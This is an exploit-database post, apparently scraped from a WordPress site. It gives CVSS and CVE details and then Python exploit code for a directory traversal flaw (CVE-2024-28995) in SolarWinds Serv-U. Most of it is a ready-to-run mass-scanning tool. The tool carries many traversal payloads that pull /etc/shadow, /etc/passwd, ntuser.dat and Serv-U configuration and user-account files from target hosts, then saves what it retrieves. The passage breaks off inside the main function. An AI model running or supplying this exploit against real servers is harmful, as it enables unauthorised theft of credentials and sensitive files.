{"id":6085,"date":"2025-05-29T05:35:09","date_gmt":"2025-05-29T05:35:09","guid":{"rendered":"http:\/\/localhost\/?p=6085"},"modified":"2025-05-29T05:35:09","modified_gmt":"2025-05-29T05:35:09","slug":"solarwinds-serv-u-1542-hf1-directory-traversal","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=6085","title":{"rendered":"SolarWinds Serv-U 15.4.2 HF1 &#8211; Directory Traversal"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">SolarWinds Serv-U 15.4.2 HF1 &#8211; Directory Traversal<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52311<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-29T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-29T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">8.6<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ff4444; font-weight: bold;\">HIGH<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:N\/A:N<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2024-28995<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: SolarWinds&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: SolarWinds Serv-U 15.4.2 HF1 &#8211; Directory Traversal<br \/>\n<br \/># Date: 2025-05-28<br \/>\n<br \/># Exploit Author: @ibrahimsql<br \/>\n<br \/># Exploit Author&#8217;s github: https:\/\/github.com\/ibrahimsql<br \/>\n<br \/># Vendor Homepage: https:\/\/www.solarwinds.com\/serv-u-managed-file-transfer-server<br \/>\n<br \/># Software Link: https:\/\/www.solarwinds.com\/serv-u-managed-file-transfer-server\/registration<br \/>\n<br \/># Version: <= 15.4.2 HF1\n<br \/># Tested on: Kali Linux 2024.1<br \/>\n<br \/># CVE: CVE-2024-28995<br \/>\n<br \/># Description:<br \/>\n<br \/># SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow<br \/>\n<br \/># attackers to read sensitive files on the host machine. This exploit demonstrates multiple<br \/>\n<br \/># path traversal techniques to access Serv-U log files and other system files on both<br \/>\n<br \/># Windows and Linux systems.<br \/>\n<br \/>#<br \/>\n<br \/># References:<br \/>\n<br \/># &#8211; https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-28995<br \/>\n<br \/># &#8211; https:\/\/www.rapid7.com\/blog\/post\/2024\/06\/11\/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u\/<br \/>\n<br \/># &#8211; https:\/\/thehackernews.com\/2024\/06\/solarwinds-serv-u-vulnerability-under.html<\/p>\n<p># Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0<\/p>\n<p>#!\/usr\/bin\/env python3<br \/>\n<br \/># -*- coding: utf-8 -*-<\/p>\n<p>import argparse<br \/>\n<br \/>import concurrent.futures<br \/>\n<br \/>import json<br \/>\n<br \/>import os<br \/>\n<br \/>import re<br \/>\n<br \/>import sys<br \/>\n<br \/>import time<br \/>\n<br \/>from concurrent.futures import ThreadPoolExecutor, as_completed<br \/>\n<br \/>from urllib.parse import urlparse<\/p>\n<p>import requests<br \/>\n<br \/>from colorama import Fore, Back, Style, init<\/p>\n<p># Initialize colorama<br \/>\n<br \/>init(autoreset=True)<\/p>\n<p># Disable SSL warnings<br \/>\n<br \/>try:<br \/>\n<br \/>    import urllib3<br \/>\n<br \/>    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br \/>\n<br \/>except ImportError:<br \/>\n<br \/>    pass<\/p>\n<p>BASE_DIR = os.path.dirname(os.path.abspath(__file__))<\/p>\n<p>BANNER = rf&#8221;&#8217;<br \/>\n<br \/>{Fore.CYAN}<br \/>\n<br \/>   ______     _______     ____   ___ ____  _  _        ____  ___  ___   ___  ____<br \/>\n<br \/>  \/ ___\\ \\   \/ \/ ____|   |___ \\ \/ _ \\___ \\| || |      |___ \\( _ )\/ _ \\ \/ _ \\| ___|<br \/>\n<br \/> | |    \\ \\ \/ \/|  _| _____ __) | | | |__) | || |_ _____ __) \/ _ \\ (_) | (_) |___ \\<br \/>\n<br \/> | |___  \\ V \/ | |__|_____\/ __\/| |_| \/ __\/|__   _|_____\/ __\/ (_) \\__, |\\__, |___) |<br \/>\n<br \/>  \\____|  \\_\/  |_____|   |_____|\\___\/_____|  |_|      |_____\\___\/  \/_\/   \/_\/|____\/<br \/>\n<br \/>{Fore.YELLOW}<br \/>\n<br \/>       SolarWinds Serv-U Directory Traversal Exploit<br \/>\n<br \/>{Fore.RED}       CVE-2024-28995 by @ibrahimsql<br \/>\n<br \/>{Style.RESET_ALL}<br \/>\n<br \/>&#8221;&#8217;<\/p>\n<p>class ScanResult:<br \/>\n<br \/>    def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None):<br \/>\n<br \/>        self.url = url<br \/>\n<br \/>        self.is_vulnerable = is_vulnerable<br \/>\n<br \/>        self.version = version<br \/>\n<br \/>        self.os_type = os_type<br \/>\n<br \/>        self.file_content = file_content<br \/>\n<br \/>        self.path = path<br \/>\n<br \/>        self.timestamp = time.strftime(&#8220;%Y-%m-%d %H:%M:%S&#8221;)<\/p>\n<p>    def to_dict(self):<br \/>\n<br \/>        return {<br \/>\n<br \/>            &#8220;url&#8221;: self.url,<br \/>\n<br \/>            &#8220;is_vulnerable&#8221;: self.is_vulnerable,<br \/>\n<br \/>            &#8220;version&#8221;: self.version,<br \/>\n<br \/>            &#8220;os_type&#8221;: self.os_type,<br \/>\n<br \/>            &#8220;path&#8221;: self.path,<br \/>\n<br \/>            &#8220;timestamp&#8221;: self.timestamp<br \/>\n<br \/>        }<\/p>\n<p>def print_banner():<br \/>\n<br \/>    print(BANNER)<\/p>\n<p>def normalize_url(url):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Normalize URL to ensure it has http\/https protocol.&#8221;&#8221;&#8221;<br \/>\n<br \/>    if not url.startswith(&#8216;http&#8217;):<br \/>\n<br \/>        url = f&#8221;https:\/\/{url}&#8221;<br \/>\n<br \/>    return url.rstrip(&#8216;\/&#8217;)<\/p>\n<p>def extract_server_version(headers):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Extract Serv-U version from server headers if available.&#8221;&#8221;&#8221;<br \/>\n<br \/>    if &#8216;Server&#8217; in headers:<br \/>\n<br \/>        server_header = headers[&#8216;Server&#8217;]<br \/>\n<br \/>        # Look for Serv-U version pattern<br \/>\n<br \/>        match = re.search(r&#8217;Serv-U\/(\\d+\\.\\d+\\.\\d+)&#8217;, server_header)<br \/>\n<br \/>        if match:<br \/>\n<br \/>            return match.group(1)<br \/>\n<br \/>    return None<\/p>\n<p>def is_vulnerable_version(version):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Check if the detected version is vulnerable (15.4.2 HF1 or lower).&#8221;&#8221;&#8221;<br \/>\n<br \/>    if not version:<br \/>\n<br \/>        return None<\/p>\n<p>    try:<br \/>\n<br \/>        # Split version numbers<br \/>\n<br \/>        major, minor, patch = map(int, version.split(&#8216;.&#8217;))<\/p>\n<p>        # Vulnerable if lower than 15.4.2 HF2<br \/>\n<br \/>        if major < 15:\n<br \/>            return True<br \/>\n<br \/>        elif major == 15:<br \/>\n<br \/>            if minor < 4:\n<br \/>                return True<br \/>\n<br \/>            elif minor == 4:<br \/>\n<br \/>                if patch <= 2:  # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable\n<br \/>                    return True<br \/>\n<br \/>    except:<br \/>\n<br \/>        pass<\/p>\n<p>    return False<\/p>\n<p>def get_request(url, timeout=15):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Make a GET request to the specified URL.&#8221;&#8221;&#8221;<br \/>\n<br \/>    try:<br \/>\n<br \/>        response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False)<br \/>\n<br \/>        return response<br \/>\n<br \/>    except requests.RequestException as e:<br \/>\n<br \/>        return None<\/p>\n<p>def detect_os_type(content):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Detect the operating system type from the file content.&#8221;&#8221;&#8221;<br \/>\n<br \/>    if any(indicator in content for indicator in [&#8220;root:&#8221;, &#8220;bin:x:&#8221;, &#8220;daemon:&#8221;, &#8220;\/etc\/&#8221;, &#8220;\/home\/&#8221;, &#8220;\/var\/&#8221;]):<br \/>\n<br \/>        return &#8220;Linux&#8221;<br \/>\n<br \/>    elif any(indicator in content for indicator in [&#8220;[fonts]&#8221;, &#8220;[extensions]&#8221;, &#8220;[Mail]&#8221;, &#8220;Windows&#8221;, &#8220;ProgramData&#8221;, &#8220;Program Files&#8221;]):<br \/>\n<br \/>        return &#8220;Windows&#8221;<br \/>\n<br \/>    return None<\/p>\n<p>def get_default_payloads():<br \/>\n<br \/>    &#8220;&#8221;&#8221;Return a list of directory traversal payloads specific to CVE-2024-28995.&#8221;&#8221;&#8221;<br \/>\n<br \/>    return [<br \/>\n<br \/>        # Windows payloads &#8211; Serv-U specific files<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/&#038;InternalFile=Serv-U-StartupLog.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U Startup Log&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/..\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/^&#038;InternalFile=Serv-U-StartupLog.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U Startup Log Alt&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\\\\..\\\\..\\\\..\\\\..\\\\ProgramData\\\\RhinoSoft\\\\Serv-U\\\\&#038;InternalFile=Serv-U-StartupLog.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U Startup Log Alt2&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=..\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/&#038;InternalFile=Serv-U-StartupLog.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U Startup Log Alt3&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=..\/..\/..\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/&#038;InternalFile=Serv-U-StartupLog.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U Startup Log Deep&#8221;},<\/p>\n<p>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/&#038;InternalFile=ServUStartupLog.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U Startup Log Alt4&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/&#038;InternalFile=Serv-U.Log&#8221;, &#8220;name&#8221;: &#8220;Serv-U Log&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/&#038;InternalFile=ServULog.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U Log Alt&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/&#038;InternalFile=ServUErrorLog.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U Error Log&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/&#038;InternalFile=Serv-U-ErrorLog.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U Error Log Alt&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/&#038;InternalFile=Serv-U.ini&#8221;, &#8220;name&#8221;: &#8220;Serv-U Config&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/&#038;InternalFile=ServUAdmin.ini&#8221;, &#8220;name&#8221;: &#8220;Serv-U Admin Config&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/Users\/&#038;InternalFile=Users.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U Users&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/ProgramData\/RhinoSoft\/Serv-U\/Users\/&#038;InternalFile=UserAccounts.txt&#8221;, &#8220;name&#8221;: &#8220;Serv-U User Accounts&#8221;},<\/p>\n<p>        # Verify Windows with various system files<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/..\/..\/..\/..\/windows&#038;InternalFile=win.ini&#8221;, &#8220;name&#8221;: &#8220;Windows ini&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\\\\..\\\\..\\\\..\\\\..\\\\windows&#038;InternalFile=win.ini&#8221;, &#8220;name&#8221;: &#8220;Windows ini Alt&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=..\/..\/..\/..\/windows&#038;InternalFile=win.ini&#8221;, &#8220;name&#8221;: &#8220;Windows ini Alt2&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=..\/..\/..\/..\/..\/..\/windows&#038;InternalFile=win.ini&#8221;, &#8220;name&#8221;: &#8220;Windows ini Deep&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/Windows\/system.ini&#8221;, &#8220;name&#8221;: &#8220;Windows system.ini&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/Windows\/System32\/&#038;InternalFile=drivers.ini&#8221;, &#8220;name&#8221;: &#8220;Windows drivers.ini&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/Windows\/System32\/drivers\/etc\/&#038;InternalFile=hosts&#8221;, &#8220;name&#8221;: &#8220;Windows hosts&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/Windows\/System32\/&#038;InternalFile=config.nt&#8221;, &#8220;name&#8221;: &#8220;Windows config.nt&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/Windows\/System32\/&#038;InternalFile=ntuser.dat&#8221;, &#8220;name&#8221;: &#8220;Windows ntuser.dat&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/Windows\/boot.ini&#8221;, &#8220;name&#8221;: &#8220;Windows boot.ini&#8221;},<\/p>\n<p>        # Verify Linux with various system files<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\\\\..\\\\..\\\\..\\\\..\\\\etc&#038;InternalFile=passwd&#8221;, &#8220;name&#8221;: &#8220;Linux passwd&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/..\/..\/..\/..\/etc^&#038;InternalFile=passwd&#8221;, &#8220;name&#8221;: &#8220;Linux passwd Alt&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\\\\..\\\\..\\\\..\\\\..\\\\etc\/passwd&#8221;, &#8220;name&#8221;: &#8220;Linux passwd Alt2&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=..\/..\/..\/..\/etc&#038;InternalFile=passwd&#8221;, &#8220;name&#8221;: &#8220;Linux passwd Alt3&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=..\/..\/..\/..\/..\/..\/etc&#038;InternalFile=passwd&#8221;, &#8220;name&#8221;: &#8220;Linux passwd Deep&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/etc\/&#038;InternalFile=shadow&#8221;, &#8220;name&#8221;: &#8220;Linux shadow&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/etc\/&#038;InternalFile=hosts&#8221;, &#8220;name&#8221;: &#8220;Linux hosts&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/etc\/&#038;InternalFile=hostname&#8221;, &#8220;name&#8221;: &#8220;Linux hostname&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/etc\/&#038;InternalFile=issue&#8221;, &#8220;name&#8221;: &#8220;Linux issue&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: &#8220;\/?InternalDir=\/.\/..\/..\/..\/etc\/&#038;InternalFile=os-release&#8221;, &#8220;name&#8221;: &#8220;Linux os-release&#8221;}<br \/>\n<br \/>    ]<\/p>\n<p>def create_custom_payload(directory, filename):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Create a custom payload with the specified directory and filename.&#8221;&#8221;&#8221;<br \/>\n<br \/>    # Try both encoding styles<br \/>\n<br \/>    payloads = [<br \/>\n<br \/>        {&#8220;path&#8221;: f&#8221;\/?InternalDir=\/.\/..\/..\/..\/{directory}&#038;InternalFile={filename}&#8221;, &#8220;name&#8221;: f&#8221;Custom {filename}&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: f&#8221;\/?InternalDir=\/..\/..\/..\/..\/{directory}^&#038;InternalFile={filename}&#8221;, &#8220;name&#8221;: f&#8221;Custom {filename} Alt&#8221;},<br \/>\n<br \/>        {&#8220;path&#8221;: f&#8221;\/?InternalDir=\\\\..\\\\..\\\\..\\\\..\\\\{directory}&#038;InternalFile={filename}&#8221;, &#8220;name&#8221;: f&#8221;Custom {filename} Alt2&#8243;}<br \/>\n<br \/>    ]<br \/>\n<br \/>    return payloads<\/p>\n<p>def load_wordlist(wordlist_path):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Load custom paths from a wordlist file.&#8221;&#8221;&#8221;<br \/>\n<br \/>    payloads = []<br \/>\n<br \/>    try:<br \/>\n<br \/>        with open(wordlist_path, &#8216;r&#8217;) as f:<br \/>\n<br \/>            for line in f:<br \/>\n<br \/>                line = line.strip()<br \/>\n<br \/>                if line and not line.startswith(&#8216;#&#8217;):<br \/>\n<br \/>                    # Check if the line contains a directory and file separated by a delimiter<br \/>\n<br \/>                    if &#8216;:&#8217; in line:<br \/>\n<br \/>                        directory, filename = line.split(&#8216;:&#8217;, 1)<br \/>\n<br \/>                        payloads.extend(create_custom_payload(directory, filename))<br \/>\n<br \/>                    else:<br \/>\n<br \/>                        # Assume it&#8217;s a complete path<br \/>\n<br \/>                        payloads.append({&#8220;path&#8221;: line, &#8220;name&#8221;: f&#8221;Wordlist: {line[:20]}&#8230;&#8221;})<br \/>\n<br \/>        return payloads<br \/>\n<br \/>    except Exception as e:<br \/>\n<br \/>        print(f&#8221;{Fore.RED}[!] Error loading wordlist: {e}{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>        return []<\/p>\n<p>def scan_target(url, custom_payloads=None):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Scan a target URL for the CVE-2024-28995 vulnerability.&#8221;&#8221;&#8221;<br \/>\n<br \/>    url = normalize_url(url)<br \/>\n<br \/>    result = ScanResult(url)<\/p>\n<p>    # Try to get server version first<br \/>\n<br \/>    try:<br \/>\n<br \/>        response = get_request(url)<br \/>\n<br \/>        if response and response.headers:<br \/>\n<br \/>            result.version = extract_server_version(response.headers)<br \/>\n<br \/>            vulnerable_version = is_vulnerable_version(result.version)<\/p>\n<p>            if vulnerable_version is False:<br \/>\n<br \/>                print(f&#8221;{Fore.YELLOW}[*] {url} &#8211; Serv-U version {result.version} appears to be patched{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>                # Still continue scanning as version detection may not be reliable<br \/>\n<br \/>    except Exception as e:<br \/>\n<br \/>        pass<\/p>\n<p>    # Get all payloads to try<br \/>\n<br \/>    payloads = get_default_payloads()<br \/>\n<br \/>    if custom_payloads:<br \/>\n<br \/>        payloads.extend(custom_payloads)<\/p>\n<p>    # Try each payload<br \/>\n<br \/>    for payload in payloads:<br \/>\n<br \/>        full_url = f&#8221;{url}{payload[&#8216;path&#8217;]}&#8221;<br \/>\n<br \/>        try:<br \/>\n<br \/>            print(f&#8221;{Fore.BLUE}[*] Trying: {payload[&#8216;name&#8217;]} on {url}{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>            response = get_request(full_url)<\/p>\n<p>            if response and response.status_code == 200:<br \/>\n<br \/>                content = response.text<\/p>\n<p>                # Check if the response contains meaningful content<br \/>\n<br \/>                if len(content) > 100:  # Arbitrary threshold to filter out error pages<br \/>\n<br \/>                    os_type = detect_os_type(content)<br \/>\n<br \/>                    if os_type:<br \/>\n<br \/>                        result.is_vulnerable = True<br \/>\n<br \/>                        result.os_type = os_type<br \/>\n<br \/>                        result.file_content = content<br \/>\n<br \/>                        result.path = payload[&#8216;path&#8217;]<\/p>\n<p>                        print(f&#8221;{Fore.GREEN}[+] {Fore.RED}VULNERABLE: {url} &#8211; {payload[&#8216;name&#8217;]} &#8211; Detected {os_type} system{Style.RESET_ALL}&#8221;)<\/p>\n<p>                        # Successful match &#8211; no need to try more payloads<br \/>\n<br \/>                        return result<br \/>\n<br \/>        except Exception as e:<br \/>\n<br \/>            continue<\/p>\n<p>    if not result.is_vulnerable:<br \/>\n<br \/>        print(f&#8221;{Fore.RED}[-] Not vulnerable: {url}{Style.RESET_ALL}&#8221;)<\/p>\n<p>    return result<\/p>\n<p>def scan_multiple_targets(targets, custom_dir=None, custom_file=None, wordlist=None):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Scan multiple targets using thread pool.&#8221;&#8221;&#8221;<br \/>\n<br \/>    results = []<br \/>\n<br \/>    custom_payloads = []<\/p>\n<p>    # Add custom payloads if specified<br \/>\n<br \/>    if custom_dir and custom_file:<br \/>\n<br \/>        custom_payloads.extend(create_custom_payload(custom_dir, custom_file))<\/p>\n<p>    # Add wordlist payloads if specified<br \/>\n<br \/>    if wordlist:<br \/>\n<br \/>        custom_payloads.extend(load_wordlist(wordlist))<\/p>\n<p>    print(f&#8221;{Fore.CYAN}[*] Starting scan of {len(targets)} targets with {len(custom_payloads) + len(get_default_payloads())} payloads{Style.RESET_ALL}&#8221;)<\/p>\n<p>    # Use fixed thread count of 10<br \/>\n<br \/>    with ThreadPoolExecutor(max_workers=10) as executor:<br \/>\n<br \/>        future_to_url = {executor.submit(scan_target, target, custom_payloads): target for target in targets}<\/p>\n<p>        for future in as_completed(future_to_url):<br \/>\n<br \/>            try:<br \/>\n<br \/>                result = future.result()<br \/>\n<br \/>                results.append(result)<br \/>\n<br \/>            except Exception as e:<br \/>\n<br \/>                print(f&#8221;{Fore.RED}[!] Error scanning {future_to_url[future]}: {e}{Style.RESET_ALL}&#8221;)<\/p>\n<p>    return results<\/p>\n<p>def save_results(results, output_file):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Save scan results to a JSON file.&#8221;&#8221;&#8221;<br \/>\n<br \/>    output_data = [result.to_dict() for result in results]<\/p>\n<p>    try:<br \/>\n<br \/>        with open(output_file, &#8216;w&#8217;) as f:<br \/>\n<br \/>            json.dump(output_data, f, indent=2)<br \/>\n<br \/>        print(f&#8221;{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>    except Exception as e:<br \/>\n<br \/>        print(f&#8221;{Fore.RED}[!] Error saving results: {e}{Style.RESET_ALL}&#8221;)<\/p>\n<p>def save_vulnerable_content(result, output_dir):<br \/>\n<br \/>    &#8220;&#8221;&#8221;Save the vulnerable file content to a file.&#8221;&#8221;&#8221;<br \/>\n<br \/>    if not os.path.exists(output_dir):<br \/>\n<br \/>        os.makedirs(output_dir)<\/p>\n<p>    # Create a safe filename from the URL<br \/>\n<br \/>    parsed_url = urlparse(result.url)<br \/>\n<br \/>    safe_filename = f&#8221;{parsed_url.netloc.replace(&#8216;:&#8217;, &#8216;_&#8217;)}.txt&#8221;<br \/>\n<br \/>    output_path = os.path.join(output_dir, safe_filename)<\/p>\n<p>    try:<br \/>\n<br \/>        with open(output_path, &#8216;w&#8217;) as f:<br \/>\n<br \/>            f.write(f&#8221;URL: {result.url}\\n&#8221;)<br \/>\n<br \/>            f.write(f&#8221;Path: {result.path}\\n&#8221;)<br \/>\n<br \/>            f.write(f&#8221;Version: {result.version or &#8216;Unknown&#8217;}\\n&#8221;)<br \/>\n<br \/>            f.write(f&#8221;OS Type: {result.os_type or &#8216;Unknown&#8217;}\\n&#8221;)<br \/>\n<br \/>            f.write(f&#8221;Timestamp: {result.timestamp}\\n&#8221;)<br \/>\n<br \/>            f.write(&#8220;\\n&#8212; File Content &#8212;\\n&#8221;)<br \/>\n<br \/>            f.write(result.file_content)<\/p>\n<p>        print(f&#8221;{Fore.GREEN}[+] Saved vulnerable content to {output_path}{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>    except Exception as e:<br \/>\n<br \/>        print(f&#8221;{Fore.RED}[!] Error saving content: {e}{Style.RESET_ALL}&#8221;)<\/p>\n<p>def main():<br \/>\n<br \/>    parser = argparse.ArgumentParser(description=&#8221;CVE-2024-28995 &#8211; SolarWinds Serv-U Directory Traversal Scanner&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;-u&#8221;, &#8220;&#8211;url&#8221;, help=&#8221;Target URL&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;-f&#8221;, &#8220;&#8211;file&#8221;, help=&#8221;File containing a list of URLs to scan&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;-d&#8221;, &#8220;&#8211;dir&#8221;, help=&#8221;Custom directory path to read (e.g., ProgramData\/RhinoSoft\/Serv-U\/)&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;-n&#8221;, &#8220;&#8211;filename&#8221;, help=&#8221;Custom filename to read (e.g., Serv-U-StartupLog.txt)&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;-w&#8221;, &#8220;&#8211;wordlist&#8221;, help=&#8221;Path to wordlist containing custom paths to try&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;-o&#8221;, &#8220;&#8211;output&#8221;, help=&#8221;Output JSON file to save results&#8221;)<\/p>\n<p>    args = parser.parse_args()<\/p>\n<p>    print_banner()<\/p>\n<p>    # Validate arguments<br \/>\n<br \/>    if not args.url and not args.file:<br \/>\n<br \/>        parser.print_help()<br \/>\n<br \/>        print(f&#8221;\\n{Fore.RED}[!] Error: Either -u\/&#8211;url or -f\/&#8211;file is required{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>        sys.exit(1)<\/p>\n<p>    targets = []<\/p>\n<p>    # Get targets<br \/>\n<br \/>    if args.url:<br \/>\n<br \/>        targets.append(args.url)<\/p>\n<p>    if args.file:<br \/>\n<br \/>        try:<br \/>\n<br \/>            with open(args.file, &#8220;r&#8221;) as f:<br \/>\n<br \/>                targets.extend([line.strip() for line in f.readlines() if line.strip()])<br \/>\n<br \/>        except Exception as e:<br \/>\n<br \/>            print(f&#8221;{Fore.RED}[!] Error reading file {args.file}: {e}{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>            sys.exit(1)<\/p>\n<p>    # Deduplicate targets<br \/>\n<br \/>    targets = list(set(targets))<\/p>\n<p>    if not targets:<br \/>\n<br \/>        